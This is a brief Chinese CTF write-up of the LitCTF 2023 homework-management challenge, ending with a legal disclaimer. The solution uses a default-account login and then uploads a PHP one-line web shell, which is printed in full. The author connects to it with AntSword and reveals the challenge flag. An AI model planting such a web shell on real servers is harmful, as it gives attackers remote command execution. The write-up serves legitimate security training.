【CTF Web】NSSCTF 3867 [LitCTF 2023]作业管理系统 Writeup（文件上传+代码审计+弱口令）

[LitCTF 2023]作业管理系统

交作业！！但是哪里不对？
出题人 探姬

---

解法

查看网页源代码。

使用默认账户登入系统。

这里可以上传文件。

上传一个一句话木马。

<?php @eval($_POST['cmd']); ?>

上传成功。

使用蚁剑连接。

在文件管理找到 flag。

Flag

NSSCTF{e10c4ecc-4ba6-4efd-95a7-75a21d21950b}

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。